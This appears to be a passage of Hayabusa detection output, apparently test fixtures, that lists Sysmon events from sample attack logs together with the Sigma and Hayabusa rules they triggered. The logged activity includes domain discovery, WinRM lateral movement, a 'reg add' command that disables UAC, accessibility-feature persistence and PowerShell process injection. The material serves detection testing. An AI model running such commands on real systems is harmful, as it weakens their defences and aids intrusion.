+2019-05-14 23:04:06.339 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09cc920e\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
+2019-05-14 23:04:28.860 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09e09039\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
+2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49583 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49584 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49586 (alice.insecurebank.local) | Dst: 10.59.4.24:445 (edward) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49587 (alice.insecurebank.local) | Dst: 10.59.4.21:445 (bob) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49588 (alice.insecurebank.local) | Dst: 10.59.4.22:445 (CHARLES) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49589 (alice.insecurebank.local) | Dst: 10.59.4.25:445 (FRED) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49590 (alice.insecurebank.local) | Dst: 10.59.4.11:445 (DC1) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49592 (alice.insecurebank.local) | Dst: 10.59.4.23:445 (dave) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49593 (alice.insecurebank.local) | Dst: 10.59.4.12:445 (DEV_SERVER) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:31:27.973 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_18_Invoke_UserHunter_NetSessionEnum_DC-srvsvc.evtx
+2019-05-15 02:42:52.833 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
+2019-05-15 02:42:52.848 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
+2019-05-15 02:42:53.854 +09:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49304 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
+2019-05-15 02:43:03.888 +09:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49306 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
+2019-05-15 13:18:40.474 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - access to the VBA project object model in the Macro Settings changed | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3804 | PGUID: 365ABB72-92DF-5CDB-0000-0010A15E1300,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx
+2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Evas,Office Security Settings Changed,,../hayabusa-rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx
+2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | Process: C:\Windows\System32\winrshost.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x12fe05 | PID: 3948 | PGUID: DFAE8213-BD78-5CDC-0000-0010C7FE1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
+2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /C ipconfig | Process: C:\Windows\System32\cmd.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | LID: 0x12fe05 | PID: 3136 | PGUID: DFAE8213-BD78-5CDC-0000-001091041300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
+2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: ipconfig | Process: C:\Windows\System32\ipconfig.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\cmd.exe /C ipconfig | LID: 0x12fe05 | PID: 1744 | PGUID: DFAE8213-BD78-5CDC-0000-001074051300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
+2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"Lateral Movement - Windows Remote Management | Cmd: ""C:\Windows\system32\HOSTNAME.EXE"" | Process: C:\Windows\System32\HOSTNAME.EXE | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\wsmprovhost.exe -Embedding | LID: 0x15daaf | PID: 2936 | PGUID: DFAE8213-BF0B-5CDC-0000-00105A951600 | Hash: SHA1=4ED8B225C9CC97DD02C9A5DFD9F733C353F83E36,MD5=74D1E6E8AC6ABCC1DE934C8C5E422B64,SHA256=CA40BB9470E8E73767F3AA43DDF51F814481167DEC6C2FAA1996C18AB2C621DB,IMPHASH=65F157041816229C2919A683CBA86F70",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
+2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,low,Disc,Suspicious Execution of Hostname,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_hostname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
+2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Exec,Remote PowerShell Session Host Process (WinRM),,../hayabusa-rules/sigma/process_creation/proc_creation_win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
+2019-05-16 22:10:13.760 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell CLM Setting Changed | DeleteValue: HKLM\System\CurrentControlSet\Control\SESSION MANAGER\Environment\__PSLockdownPolicy | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3580 | PGUID: DFAE8213-5B49-5CDD-0000-0010EE520500,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Powershell_CLM_Disabled_Sysmon_12.evtx
+2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f | Process: C:\Windows\System32\reg.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x585e6 | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
+2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | CreateKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
+2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
+2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,13,medium,PrivEsc | Evas,Disable UAC Using Registry,,../hayabusa-rules/sigma/registry_event/win_re_disable_uac_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
+2019-05-17 01:08:30.516 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: C:\Windows\system32\LogonUI.exe | PID: 1684 | PGUID: DFAE8213-8AFE-5CDD-0000-001035B90A00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 1720 | PGUID: DFAE8213-8B02-5CDD-0000-00109BCA0A00 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\osk.exe"" | LID: 0x3e7 | PID: 3764 | PGUID: DFAE8213-8B08-5CDD-0000-001011CE0A00 | Hash: SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-19 02:16:08.348 +09:00,IEWIN7,10,low,,Process Access,Src Process: 耙甯\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.208 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.255 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.270 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.286 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.317 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
